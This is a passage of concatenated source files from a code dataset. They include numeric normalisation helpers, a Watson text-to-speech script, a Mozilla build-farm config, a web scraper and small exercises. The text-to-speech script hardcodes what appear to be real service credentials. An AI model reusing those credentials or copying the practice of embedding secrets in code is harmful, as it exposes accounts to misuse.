class.\r\n\"\"\"\r\n\r\nfrom __future__ import division\r\nimport numpy as np\r\nfrom numpy import fmax, fmin, std # normTruncate\r\nfrom numpy import array, mean, multiply, matrix # normLinear\r\n\r\ndef sigmoid(x):\r\n return 1/(1+np.exp(-x))\r\n\r\ndef logit(x):\r\n return np.log(x/(1-x))\r\n \r\ndef tanh(x):\r\n return (1-np.exp(-2*x))/(1+np.exp(-2*x))\r\n \r\ndef tanhInv(x):\r\n return 0.5*np.log((1+x)/(1-x))\r\n\r\ndef softplus(x):\r\n return np.log(1+np.exp(x))\r\n \r\ndef softplusInv(x):\r\n return np.log(np.exp(x)-1)\r\n\r\n\r\ndef normActiv(data,dataStatistics=dict({}),activation='tanh',norm='sphere',by='row'): # by = 'row','col','all' for norm='linear'\r\n activationDict = dict({'sigmoid':sigmoid,'tanh':tanh,'softplus':softplus})\r\n normDict = dict({'linear':normLinear,'sphere':normSphere,'trunc':normTruncate})\r\n activationOpt = activationDict[activation] \r\n normOpt = normDict[norm] \r\n if len(dataStatistics)==0:\r\n data,dataStatistics = normOpt(data,by=by)\r\n data = activationOpt(data)\r\n return data,dataStatistics\r\n else:\r\n data = activationOpt(normOpt(data,dataStatistics=dataStatistics,by=by))\r\n return data \r\n \r\ndef denormActiv(data,dataStatistics,activation='tanh',norm='sphere'):\r\n activationDict = dict({'sigmoid':logit,'tanh':tanhInv,'softplus':softplusInv})\r\n normDict = dict({'linear':denormLinear,'sphere':denormSphere,'trunc':denormTruncate})\r\n activationInvOpt = activationDict[activation] \r\n denormOpt = normDict[norm]\r\n return denormOpt(activationInvOpt(data),dataStatistics) \r\n\r\ndef normTruncate(data,dataStatistics=dict({}),by=None):\r\n truncMean = mean(data,axis=0)\r\n data = data-truncMean\r\n if len(dataStatistics)==0:\r\n truncDev = 3*std(data)\r\n else:\r\n truncDev = dataStatistics['truncDev']\r\n data = fmax(fmin(data,truncDev),-truncDev)/truncDev \r\n data = (data+1)*0.4+0.1\r\n if len(dataStatistics)==0:\r\n dataStatistics = dict({'truncMean':truncMean,'truncDev':truncDev})\r\n return data,dataStatistics\r\n else:\r\n return data\r\n\r\ndef denormTruncate(data,dataStatistics): \r\n truncMean = dataStatistics['truncMean']\r\n truncDev = dataStatistics['truncDev'] \r\n return ((data-0.1)/0.4-1)*truncDev+truncMean\r\n\r\n\r\ndef normLinear(data,dataStatistics=dict({}),by='row'):\r\n if len(dataStatistics)==0:\r\n if by == 'row':\r\n dataMean = matrix(mean(data,axis=1)).T\r\n elif by == 'col':\r\n dataMean = mean(data,axis=0)\r\n else:\r\n dataMean = mean(data)\r\n else:\r\n dataMean = dataStatistics['dataMean']\r\n if len(dataStatistics)==0:\r\n if by == 'row':\r\n dataDev = matrix(std(data,axis=1)).T\r\n elif by == 'col':\r\n dataDev = std(data,axis=0)\r\n else:\r\n dataDev = std(data)\r\n else:\r\n dataDev = dataStatistics['dataDev']\r\n data = array((data-dataMean)/(dataDev*3))\r\n if len(dataStatistics)==0:\r\n dataStatistics = dict({'dataMean':dataMean,'dataDev':dataDev})\r\n return data,dataStatistics\r\n else:\r\n return data\r\n \r\ndef denormLinear(data,dataStatistics):\r\n dataMean = dataStatistics['dataMean']\r\n dataDev = dataStatistics['dataDev']\r\n return array(multiply(data,(dataDev*3))+dataMean)\r\n \r\n \r\ndef normSphere(data,dataStatistics=dict({}),by=None):\r\n if len(dataStatistics)==0:\r\n dataRowMean = matrix(mean(data,axis=1)).T\r\n dataRowDev = matrix(std(data-dataRowMean,axis=1))\r\n newdata = array((data-dataRowMean)/(dataRowDev*3))\r\n newdataColMean = mean(newdata,axis=0)\r\n data = array(newdata-newdataColMean)\r\n dataDev = std(data)\r\n dataStatistics = dict({'dataRowMean':dataRowMean,'dataRowDev':dataRowDev,'newdataColMean':newdataColMean,'dataDev':dataDev})\r\n return data*0.17/dataDev,dataStatistics\r\n else:\r\n dataRowMean = dataStatistics['dataRowMean']\r\n dataRowDev = dataStatistics['dataRowDev']\r\n newdataColMean = dataStatistics['newdataColMean']\r\n dataDev = dataStatistics['dataDev']\r\n data = array((data-dataRowMean)/(dataRowDev*3)-newdataColMean)*0.17/dataDev\r\n return data\r\n \r\ndef denormSphere(data,dataStatistics):\r\n dataRowMean = dataStatistics['dataRowMean']\r\n dataRowDev = dataStatistics['dataRowDev']\r\n newdataColMean = dataStatistics['newdataColMean']\r\n dataDev = dataStatistics['dataDev']\r\n return array(multiply(data*dataDev/0.17+newdataColMean,(dataRowDev*3))+dataRowMean)\r\n \r\n \r\n ","sub_path":"codes/normLib.py","file_name":"normLib.py","file_ext":"py","file_size_in_byte":5004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"492293053","text":"import pyaudio\nimport wave\nimport time\n\nfrom StringIO import StringIO\nfrom watson_developer_cloud import TextToSpeechV1\nfrom timeout import timeout_decorate, TimeoutError\nfrom pymouse import PyMouse\n\n# define enter/exit methods for use in a context manager\nStringIO.__enter__ = lambda self: self\nStringIO.__exit__ = lambda self, e_type, e_val, tb: self.close()\n\nTextToSpeechV1.synthesize = timeout_decorate(TextToSpeechV1.synthesize, seconds=5)\ntts = TextToSpeechV1(username='68819f91-e8a5-49e3-b284-3b66ed470bb9',\n password='1tkAyaLoSdhm')\nwf = None # the wave file\n\nm = PyMouse()\ndef click():\n \"\"\"Click the mouse to start/stop avatar animation\n \"\"\"\n x, y = map(lambda n: n/2, m.screen_size())\n m.click(x, y, 1)\n\nclass SpeechError(Exception):\n pass\n\ndef callback(in_data, frame_count, time_info, status):\n \"\"\"pyaudio callback\n \"\"\"\n data = wf.readframes(frame_count)\n return data, pyaudio.paContinue\n\ndef speak(s):\n \"\"\"Do TTS on a string `s`\n \"\"\"\n global wf\n \n audio = None\n for i in range(3):\n try:\n audio = tts.synthesize(s, accept='audio/wav', voice='en-US_AllisonVoice')\n except TimeoutError:\n print('Timemout %d occured' % i)\n else:\n break\n if not audio:\n raise SpeechError('No response received')\n\n with StringIO(audio) as f:\n wf = wave.open(f, 'rb')\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True,\n stream_callback=callback)\n\n click()\n stream.start_stream()\n while stream.is_active():\n time.sleep(0.1)\n stream.stop_stream()\n stream.close()\n p.terminate()\n click()\n\ndef wrap_text(s, t=None):\n \"\"\"Wrap a string `s` with speak and express-as tags using type `t`\n \"\"\"\n if t:\n return u\"\" % t + \\\n unicode(s) + \\\n u\"\"\n else:\n return u\"\" + unicode(s) + u\"\"\n\ndef englishify(l, conj=True):\n \"\"\"Unpack a list to natural english\n \"\"\"\n if len(l) == 1:\n return l[0]\n elif len(l) == 2:\n return ' and '.join(l) if conj else ' or '.join(l)\n else:\n l_copy = l[:]\n if conj:\n l_copy[-1] = 'and ' + l_copy[-1]\n else:\n l_copy[-1] = 'or ' + l_copy[-1]\n return ', '.join(l_copy)\n\ndef main():\n speak('This is some test text')\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"117512955","text":"MAC_LION_MINIS = ['bld-lion-r5-%03d' % x for x in range(41,81)]\nMAC_SNOW_MINIS = ['moz2-darwin10-slave%02i' % x for x in range(40,57) if x not in (51,52,)] # bug683792\nLINUX_VMS = ['bld-centos5-32-vmw-%03i' % x for x in range(1,23)]\nLINUX_IXS = ['mv-moz2-linux-ix-slave%02i' % x for x in range(2,22)] + \\\n ['linux-ix-slave%02i' % x for x in [1,2,6] + range(12,43)]\nLINUX64_VMS = ['bld-centos5-64-vmw-%03i' % x for x in range(1, 7)]\nLINUX64_IXS = ['linux64-ix-slave%02i' % x for x in range(3,22)]\nWIN32_IXS = ['mw32-ix-slave%02i' % x for x in range(2,16) + [20, 26]]\nWIN64_IXS = ['w64-ix-slave%02i' % x for x in range(6,25) + range(64,85) if x not in [11,20]]\nWIN64_METRO = ['w64-ix-slave%02i' % x for x in [11,20,40,42,43]]\nMOCK_DL120G7 = ['bld-centos6-hp-%03d' % x for x in range(6,24)] # 5 staging, 17 prod, 17 try\nLINUX64_EC2 = ['bld-linux64-ec2-%03d' % x for x in range(1,51)]\n\nSLAVES = {\n 'linux': LINUX_VMS + LINUX_IXS,\n 'linux64': LINUX64_VMS + LINUX64_IXS,\n 'win32': WIN32_IXS,\n 'win64': WIN64_IXS,\n 'win64-metro': WIN64_METRO,\n 'macosx': [],\n 'macosx64': MAC_SNOW_MINIS,\n 'macosx64-lion': MAC_LION_MINIS,\n 'linux-android': LINUX_VMS + LINUX_IXS,\n 'android': LINUX_VMS + LINUX_IXS,\n 'android-xul': LINUX_VMS + LINUX_IXS,\n 'mock': MOCK_DL120G7 + LINUX64_EC2,\n}\n\nTRY_LINUX = ['bld-centos5-32-vmw-%03i' % x for x in range(23,40)]\nTRY_LINUX_IXS = ['mv-moz2-linux-ix-slave%02i' % x for x in range(22,24)] + \\\n ['linux-ix-slave%02i' % x for x in range(7,12)]\nTRY_LINUX64 = ['bld-centos5-64-vmw-%03i' % x for x in range(7, 12)]\nTRY_LINUX64_IXS= ['linux64-ix-slave%02i' % x for x in range(22,42)]\nTRY_LINUX64_EC2= ['try-linux64-ec2-%03d' % x for x in range(1,51)]\nTRY_MAC64 = ['try-mac64-slave%02i' % x for x in range(27,32)]\nTRY_WIN32_IXS = ['mw32-ix-slave%02i' % x for x in range(16,19) + range(22,26)]\nTRY_WIN64_IXS = ['w64-ix-slave%02i' % x for x in range(25,64) if x not in [40,42,43]]\nTRY_MOCK_DL120G7 = ['bld-centos6-hp-%03d' % x for x in range(24,43)]\nTRY_LION = ['bld-lion-r5-%03d' % x for x in range(1,41)]\n\nTRY_SLAVES = {\n 'linux': TRY_LINUX + TRY_LINUX_IXS,\n 'linux64': TRY_LINUX64 + TRY_LINUX64_IXS,\n 'win32': TRY_WIN32_IXS,\n 'win64': TRY_WIN64_IXS,\n 'macosx64': TRY_MAC64,\n 'macosx64-lion': TRY_LION,\n 'mock': TRY_MOCK_DL120G7 + TRY_LINUX64_EC2,\n}\n\n# Local overrides for default values\nGLOBAL_VARS = {\n 'config_repo_path': 'build/buildbot-configs',\n 'buildbotcustom_repo_path': 'build/buildbotcustom',\n 'stage_server': 'stage.mozilla.org',\n 'aus2_host': 'aus3-staging.mozilla.org',\n 'aus2_user': 'ffxbld',\n 'aus2_ssh_key': 'auspush',\n 'download_base_url': 'http://ftp.mozilla.org/pub/mozilla.org/firefox',\n 'mobile_download_base_url': 'http://ftp.mozilla.org/pub/mozilla.org/mobile',\n 'graph_server': 'graphs.mozilla.org',\n 'balrog_api_root': 'https://aus4-admin-dev.allizom.org',\n 'build_tools_repo_path': 'build/tools',\n 'base_clobber_url': 'http://build.mozilla.org/clobberer/index.php',\n 'disable_tinderbox_mail': True,\n # List of talos masters to notify of new builds,\n # and if a failure to notify the talos master should result in a warning,\n # and sendchange retry count before give up\n 'talos_masters': [\n ('buildbot-master36.build.mozilla.org:9301', True, 5),\n ],\n # List of unittest masters to notify of new builds to test,\n # if a failure to notify the master should result in a warning,\n # and sendchange retry count before give up\n 'unittest_masters': [\n ('buildbot-master36.build.mozilla.org:9301', True, 5),\n ],\n 'xulrunner_tinderbox_tree': 'XULRunner',\n 'weekly_tinderbox_tree': 'Testing',\n 'l10n_tinderbox_tree': 'Mozilla-l10n',\n 'base_mirror_urls': ['http://hg-internal.dmz.scl3.mozilla.com'],\n 'base_bundle_urls': ['http://ftp.mozilla.org/pub/mozilla.org/firefox/bundles'],\n 'tooltool_url_list': ['http://runtime-binaries.pvt.build.mozilla.org/tooltool'],\n}\n\nBUILDS_BEFORE_REBOOT = 1\nSYMBOL_SERVER_HOST = 'symbols1.dmz.phx1.mozilla.com'\n\n# Local branch overrides\nBRANCHES = {\n 'mozilla-central': {\n 'packaged_unittest_tinderbox_tree': 'Firefox',\n 'tinderbox_tree': 'Firefox',\n 'mobile_tinderbox_tree': 'Mobile',\n 'mobile_build_failure_emails': [''],\n },\n 'mozilla-release': {\n 'packaged_unittest_tinderbox_tree': 'Mozilla-Release',\n 'tinderbox_tree': 'Mozilla-Release',\n 'mobile_tinderbox_tree': 'Mozilla-Release',\n },\n 'mozilla-esr10': {\n 'packaged_unittest_tinderbox_tree': 'Mozilla-Esr10',\n 'tinderbox_tree': 'Mozilla-Esr10',\n 'mobile_tinderbox_tree': 'Mozilla-Esr10',\n },\n 'mozilla-beta': {\n 'packaged_unittest_tinderbox_tree': 'Mozilla-Beta',\n 'tinderbox_tree': 'Mozilla-Beta',\n 'mobile_tinderbox_tree': 'Mozilla-Beta',\n },\n 'mozilla-aurora': {\n 'packaged_unittest_tinderbox_tree': 'Mozilla-Aurora',\n 'tinderbox_tree': 'Mozilla-Aurora',\n 'mobile_tinderbox_tree': 'Mozilla-Aurora',\n },\n 'places': {\n 'tinderbox_tree': 'Places',\n 'mobile_tinderbox_tree': 'Places',\n 'packaged_unittest_tinderbox_tree': 'Places',\n },\n 'electrolysis': {\n 'tinderbox_tree': 'Electrolysis',\n 'mobile_tinderbox_tree': 'Electrolysis',\n 'packaged_unittest_tinderbox_tree': 'Electrolysis',\n },\n 'addonsmgr': {\n 'tinderbox_tree': 'AddonsMgr',\n 'mobile_tinderbox_tree': 'AddonsMgr',\n 'packaged_unittest_tinderbox_tree': 'AddonsMgr',\n },\n 'jaegermonkey': {\n 'tinderbox_tree': 'Jaegermonkey',\n 'mobile_tinderbox_tree': 'Jaegermonkey',\n 'packaged_unittest_tinderbox_tree': 'Jaegermonkey',\n },\n 'try': {\n 'tinderbox_tree': 'Try',\n 'mobile_tinderbox_tree': 'Try',\n 'packaged_unittest_tinderbox_tree': 'Try',\n 'download_base_url': 'http://ftp.mozilla.org/pub/mozilla.org/firefox/try-builds',\n 'mobile_download_base_url': 'http://ftp.mozilla.org/pub/mozilla.org/firefox/try-builds',\n 'enable_mail_notifier': True,\n 'notify_real_author': True,\n 'package_url': 'http://ftp.mozilla.org/pub/mozilla.org/firefox/try-builds',\n 'talos_masters': [],\n 'platforms': {\n 'win32': {\n 'env': {\n 'SYMBOL_SERVER_HOST': 'relengweb1.dmz.scl3.mozilla.com',\n 'CVS_RSH': 'ssh',\n 'MOZ_OBJDIR': 'obj-firefox',\n 'TINDERBOX_OUTPUT': '1',\n 'MOZ_CRASHREPORTER_NO_REPORT': '1',\n # Source server support, bug 506702\n 'PDBSTR_PATH': '/c/Program Files/Debugging Tools for Windows (x64)/srcsrv/pdbstr.exe',\n 'HG_SHARE_BASE_DIR': 'e:/builds/hg-shared',\n 'BINSCOPE': 'C:\\Program Files\\Microsoft\\SDL BinScope\\Binscope.exe',\n 'PATH': \"${MOZILLABUILD}buildbotve\\\\scripts;${PATH}\",\n }\n }\n }\n },\n}\n\nPLATFORM_VARS = {}\n\nPROJECTS = {\n 'fuzzing': {\n 'scripts_repo': 'http://hg.mozilla.org/build/tools',\n 'fuzzing_repo': 'ssh://ffxbld@hg.mozilla.org/private/fuzzing',\n 'fuzzing_remote_host': 'ffxbld@pvtbuilds2.dmz.scl3.mozilla.com',\n # Path needs extra leading slash due to optparse expansion on Win32\n 'fuzzing_base_dir': '//mnt/pvt_builds/fuzzing/',\n 'idle_slaves': 3,\n 'disable_tinderbox_mail': False,\n },\n 'nanojit': {\n 'scripts_repo': 'http://hg.mozilla.org/build/tools',\n 'idle_slaves': 3,\n 'tinderbox_tree': 'Nanojit',\n 'disable_tinderbox_mail': False,\n },\n 'spidermonkey_mozilla-inbound': {\n 'scripts_repo': 'http://hg.mozilla.org/build/tools',\n 'idle_slaves': 0,\n 'tinderbox_tree': 'Mozilla-Inbound',\n 'disable_tinderbox_mail': False,\n },\n 'spidermonkey_ionmonkey': {\n 'scripts_repo': 'http://hg.mozilla.org/build/tools',\n 'idle_slaves': 0,\n 'tinderbox_tree': 'Ionmonkey',\n },\n}\n\nif __name__ == \"__main__\":\n import sys, pprint\n args = sys.argv[1:]\n\n # print build slave details\n host_info = {\n 'production': SLAVES,\n 'try': TRY_SLAVES,\n }\n\n if len(args) > 0:\n list_names = args\n else:\n list_names = host_info.keys()\n\n for list_name in list_names:\n for host_platform in host_info[list_name]:\n for host_name in host_info[list_name][host_platform]:\n print(\"%s,%s,%s\" % (list_name, host_platform, host_name))\n\n","sub_path":"mozilla/production_config.py","file_name":"production_config.py","file_ext":"py","file_size_in_byte":8798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"314250812","text":"#!/usr/bin/python3\r\nclass Solution:\r\n def repeatedNTimes(self, A):\r\n count = len(A)/2\r\n for item in A:\r\n if count == A.count(item): return item\r\n \r\n\r\n\r\ndef main():\r\n print(obj.repeatedNTimes([1,2,3,3]))\r\n\r\n# Start program\r\nif __name__ == \"__main__\":\r\n obj = Solution()\r\n main()\r\n ","sub_path":"problem_961_repeated_element/repeated_element.py","file_name":"repeated_element.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"42531633","text":"import wx\nimport OpenGL.GLUT as GLUT\nimport sys\n\nESCAPE = '\\033'\n\ndef keyPressed(*args):\n if args[0] == ESCAPE:\n sys.exit()\n\ndef main():\n x = 0\n while x < 10000:\n print(wx.GetMousePosition())\n x+=1\n\nif __name__ == '__main__':\n app=wx.App(None)\n main()","sub_path":"Graphics Testing/mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"163573837","text":"from __future__ import print_function\r\nfrom __future__ import division \r\n\r\nimport unittest\r\n\r\nfrom QV import * \r\n\r\nfrom QV.kind_of_quantity import * \r\nfrom QV.scale import * \r\n\r\n#----------------------------------------------------------------------------\r\nclass TestScale(unittest.TestCase):\r\n\r\n def test(self):\r\n \r\n # construction\r\n Length = KindOfQuantity('Length','L') \r\n \r\n name = 'metre'\r\n symbol = 'm' \r\n \r\n metre = RatioScale(Length,name,symbol)\r\n self.assertTrue( isinstance(metre,RatioScale) )\r\n self.assertTrue( isinstance(metre,Scale) )\r\n self.assertEqual( str(metre), symbol )\r\n self.assertEqual( metre.name, name )\r\n self.assertEqual( metre.kind_of_quantity, Length )\r\n \r\n # Should work as a dict key \r\n d = { metre: 1 }\r\n self.assertTrue( d[metre] == 1 )\r\n\r\n\r\n \r\n#============================================================================\r\nif __name__ == '__main__':\r\n unittest.main()","sub_path":"tests/test_scale.py","file_name":"test_scale.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"121687603","text":"\"\"\"\nThis module is used for optimizing molecular structures and getting ARC file\n \nbased on pybel and MOPAC!\n\nWritten by Dongsheng Cao\n\nDate:2011.3.23\n\"\"\"\n\nimport os\nimport string\n\nfrom pychem import vector3d\n\nVersion = 1.1\n\n\n################################################################################\nclass Atom:\n \"\"\"\n #################################################################\n A atom class used for wrapping some properties of atoms.\n \n Note that Coordinates is the output of the function \n \n (_ReadCoordinates).\n #################################################################\n \"\"\"\n\n def __init__(self, Coordinates):\n\n self.pos = vector3d.Vector3d()\n self.radius = 0.0\n self.Coordinates = Coordinates\n self.Element = ''\n\n def SetCoordinates(self):\n\n temp = self.Coordinates\n self.pos.x = float(temp[1])\n self.pos.y = float(temp[2])\n self.pos.z = float(temp[3])\n\n def GetCoordinates(self):\n\n self.SetCoordinates()\n\n return self.pos\n\n def SetElement(self):\n\n temp = self.Coordinates\n\n self.Element = temp[0]\n\n def GetElement(self):\n\n self.SetElement()\n\n return self.Element\n\n def SetRadius(self):\n\n radii = {'H': 1.20, 'N': 1.55, 'Na': 2.27, 'Cu': 1.40, 'Cl': 1.75, 'C': 1.70,\n 'O': 1.52, 'I': 1.98, 'P': 1.80, 'B': 1.85, 'Br': 1.85, 'S': 1.80, 'Se': 1.90,\n 'F': 1.47, 'Fe': 1.80, 'K': 2.75, 'Mn': 1.73, 'Mg': 1.73, 'Zn': 1.39, 'Hg': 1.8,\n 'Li': 1.8, '.': 1.8}\n\n temp = self.GetElement()\n\n if temp in radii.keys():\n self.radius = radii[temp]\n else:\n self.radius = radii['.']\n\n def GetRadius(self):\n\n self.SetRadius()\n\n return self.radius\n\n\n###########################################################################\n\ndef GetAtomClassList(Coordinates):\n \"\"\"\n #################################################################\n Combine all atoms in a molecule into a list form.\n \n Note that Coordinates is the output of the function (_ReadCoordinates).\n #################################################################\n \"\"\"\n Atoms = []\n for i in Coordinates:\n atom = Atom(i)\n atom.SetCoordinates()\n atom.SetElement()\n atom.SetRadius()\n Atoms.append(atom)\n return Atoms\n\n\n########################################################################### \n\ndef _ReadCoordinates(filename=\"temp\"):\n \"\"\"\n #################################################################\n Read the coordinates and charge of each atom in molecule from .arc file.\n #################################################################\n \"\"\"\n res = []\n\n f = open(filename, 'r')\n templine = f.readlines()\n f.close()\n\n for line in range(len(templine)):\n if templine[line][-7:-1] == \"CHARGE\":\n k = line\n break\n\n for i in templine[k + 4:len(templine) - 1]:\n temp = i.split()\n ElementCoordinate = [string.strip(temp[0]), string.strip(temp[1]),\n string.strip(temp[3]), string.strip(temp[5]),\n string.strip(temp[10])]\n res.append(ElementCoordinate)\n\n return res\n\n\n#############################################################################\n\n\ndef RunMOPAC(filename):\n \"\"\"\n #################################################################\n Run the MOPAC using os.system\n #################################################################\n \"\"\"\n\n itest = os.system(\"run_mopac7\" + \" \" + filename)\n # time.sleep(1)\n return itest\n","sub_path":"pychem/GeoOpt.py","file_name":"GeoOpt.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"617647467","text":"#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n\nimport json\nfrom pathlib import Path\nfrom counteriter import CounterIterator\nfrom toporender import main as renderer\n\nSPEED = 1\nHPC = 4\n\nCELLS = HPC+1\n\nhosts_iter = CounterIterator()\nswitch_iter = CounterIterator()\n\n\ndef reset_iters():\n global hosts_iter\n global switch_iter\n hosts_iter = CounterIterator()\n switch_iter = CounterIterator()\n\n\ndef circular_rshift(sbs, i):\n ai = i % len(sbs)\n return sbs[ai:]+sbs[:ai]\n\n\ndef filter_not(func, iterable):\n return filter(lambda a: not func(a), iterable)\n\n\ndef sew_rows(r1, r2, bw=None):\n return [(i, j, bw) for i in r1 for j in r2]\n\n\ndef create_cell():\n this_hosts = []\n this_switches = []\n this_links = []\n sw = f's{next(switch_iter)}'\n hosts = [f'h{next(hosts_iter)}' for _ in range(HPC)]\n this_hosts += hosts\n this_switches += [sw]\n this_links += sew_rows([sw], hosts, SPEED)\n return this_hosts, this_switches, this_links\n\n\ndef create_topo():\n this_hosts = []\n this_switches = []\n this_links = []\n stategic = []\n for _ in range(CELLS):\n h, s, l = create_cell()\n this_hosts += h\n this_switches += s\n this_links += l\n stategic.append(h[-HPC:])\n processed = list()\n for i, cell in enumerate(stategic):\n cells_taken_by_this_cell = []\n while not all(map(processed.__contains__, cell)):\n h1, *_ = filter_not(processed.__contains__, cell)\n for j, cell2 in enumerate(stategic):\n if i >= j:\n continue\n if j in cells_taken_by_this_cell:\n continue\n h2, *_ = filter_not(processed.__contains__, cell2)\n this_links.append((h1, h2, SPEED))\n processed += [h1, h2]\n cells_taken_by_this_cell.append(j)\n break\n return this_hosts, this_switches, this_links\n\n\ndef main(fn: str = 'dcell'):\n reset_iters()\n topo = create_topo()\n reset_iters()\n Path(f'{fn}.json').write_text(json.dumps(topo))\n renderer(fn)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"topocreatedcell.py","file_name":"topocreatedcell.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"404632784","text":"# importing required modules\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n# method to wait until some element shows its presence on web page\ndef wait(browser, x):\n element = WebDriverWait(browser, 20).until(EC.presence_of_element_located((By.XPATH, x)))\n return element\n# method to go into each url of cases on a single page\ndef find_and_write():\n # getting link headings of each cases\n heading = len(browser.find_elements_by_xpath(\"//h4[@class='title media-heading']/a\"))\n # open file in append\n writer = open('case.txt', 'a')\n # visiting url and fetching data and come on to previous page for next url\n for head in range(heading):\n # waiting for link to be click able\n wait(browser, \"//h4[@class='title media-heading']/a\")\n # writing heading of cases and visit the case\n writer.write(browser.find_elements_by_xpath(\"//h4[@class='title media-heading']/a\")[head].text)\n browser.find_elements_by_xpath(\"//h4[@class='title media-heading']/a\")[head].click()\n # writing all details to text file\n alldetail = browser.find_elements_by_css_selector('td')\n i = 0\n for detail in alldetail:\n i += 1\n writer.write(detail.text)\n if i % 2:\n writer.write('\\n')\n data = browser.find_elements_by_xpath(\"//div[@class='table-bordered']\")\n for paragraph in data:\n writer.write(paragraph.text)\n browser.back()\n writer.write('\\n\\n')\n # closing file after finishing\n writer.close()\n\n# enter keyword to be search\nkeyword = input(\"enter keywod to be search : \")\n# open website in chrome\nbrowser = webdriver.Chrome(executable_path='C:\\\\Users\\\\tej\\\\PycharmProjects\\\\chromedriver.exe')\nbrowser.get('https://www.legalcrystal.com/')\n# enter in search bar and search\nsearchbar = browser.find_element_by_id('JudgementName')\nsearchbar.send_keys(keyword)\nsearchbar.submit()\n# creating file in same directory\nwriter = open('case.txt', 'w')\nwriter.close()\n# for checking if url changes\nc_url = browser.current_url\n# for loop for going on next page\nfor x in range(100):\n # calling method for entering into url and fetching data\n find_and_write()\n # going on next page\n nxt = browser.find_element_by_xpath(\"//li[@class='next']/a\")\n nxt.click()\n # waiting till loading of page\n while c_url == browser.current_url:\n time.sleep(20)\n time.sleep(20)\n # changing current url\n c_url = browser.current_url\n","sub_path":"LawCases.py","file_name":"LawCases.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"307139424","text":"# coding=utf-8\nfrom count import Calculator\nimport unittest\n\n\n# 测试类一定要继承unittest.TestCase\nclass TestAdd(unittest.TestCase):\n\n # 在每一条用例开始前执行\n def setUp(self):\n print(\"start test:\")\n #dr = webdriver.Firefox()\n #初始化接口测试数据,base_url\n\n # 在每一条用例结束时执行\n def tearDown(self):\n print(\"end test.\")\n #dr.quit()\n\n # 测试方法的命名一定要以\"test\"开头\n def test_add(self):\n c = Calculator(3, 5)\n self.assertEqual(c.add(), 8)\n print(\"add\")\n\n def test_add2(self):\n c = Calculator(3, 5)\n self.assertEqual(c.add(), 8)\n print(\"add2\")\n\n\nif __name__ == \"__main__\":\n #unittest.main() # 执行用例的顺序? \n \n # 测试套件:运行一组测试的集合\n suit = unittest.TestSuite()\n suit.addTest(TestAdd(\"test_add2\"))\n suit.addTest(TestAdd(\"test_add\"))\n \n runner = unittest.TextTestRunner()\n runner.run(suit)\n\n","sub_path":"guest/test_demo/test_case/test_add.py","file_name":"test_add.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"480584290","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nProject Euler Problem 103\n=======================\n\nLet S(A) represent the sum of elements in set A of size n. We shall call\nit a special sum set if for any two non-empty disjoint subsets, B and C,\nthe following properties are true:\n\n 1. S(B) S(C); that is, sums of subsets cannot be equal.\n 2. If B contains more elements than C then S(B) > S(C).\n\nIf S(A) is minimised for a given n, we shall call it an optimum special\nsum set. The first five optimum special sum sets are given below.\n\nn = 1: {1}\nn = 2: {1, 2}\nn = 3: {2, 3, 4}\nn = 4: {3, 5, 6, 7}\nn = 5: {6, 9, 11, 12, 13}\n\nIt seems that for a given optimum set, A = {a[1], a[2], ... , a[n]}, the\nnext optimum set is of the form B = {b, a[1]+b, a[2]+b, ... ,a[n]+b},\nwhere b is the \"middle\" element on the previous row.\n\nBy applying this \"rule\" we would expect the optimum set for n = 6 to be A\n= {11, 17, 20, 22, 23, 24}, with S(A) = 117. However, this is not the\noptimum set, as we have merely applied an algorithm to provide a near\noptimum set. The optimum set for n = 6 is A = {11, 18, 19, 20, 22, 25},\nwith S(A) = 115 and corresponding set string: 111819202225.\n\nGiven that A is an optimum special sum set for n = 7, find its set string.\n\nNOTE: This problem is related to problems 105 and 106.\n\n\"\"\"\n\n\ndef main():\n return \"unimplemented\"\n\n\nif __name__ == \"__main__\":\n import ntpath\n import time\n from common.shared_functions import verify_solution\n\n problem_number = int(ntpath.basename(__file__).replace(\"euler\", \"\").replace(\".py\", \"\"))\n print(\"Retrieving my answer to Euler Problem {0} ...\".format(problem_number))\n\n ts = time.time()\n my_answer = main()\n te = time.time()\n\n print(\"My answer: {1}\".format(problem_number, my_answer))\n\n verification_type = verify_solution(problem_number, my_answer)\n print(\"Verification: {0}\".format(verification_type.name))\n print(\"Took {0} seconds.\".format(te - ts))\n","sub_path":"project-euler/solvers/euler103.py","file_name":"euler103.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"376189815","text":"#! /usr/bin/env python\n\n\"\"\"\nRuns Packet tests.\n\nRevision Info\n=============\n* $LastChangedBy: mandke $\n* $LastChangedDate: 2010-10-19 16:34:02 -0500 (Tue, 19 Oct 2010) $\n* 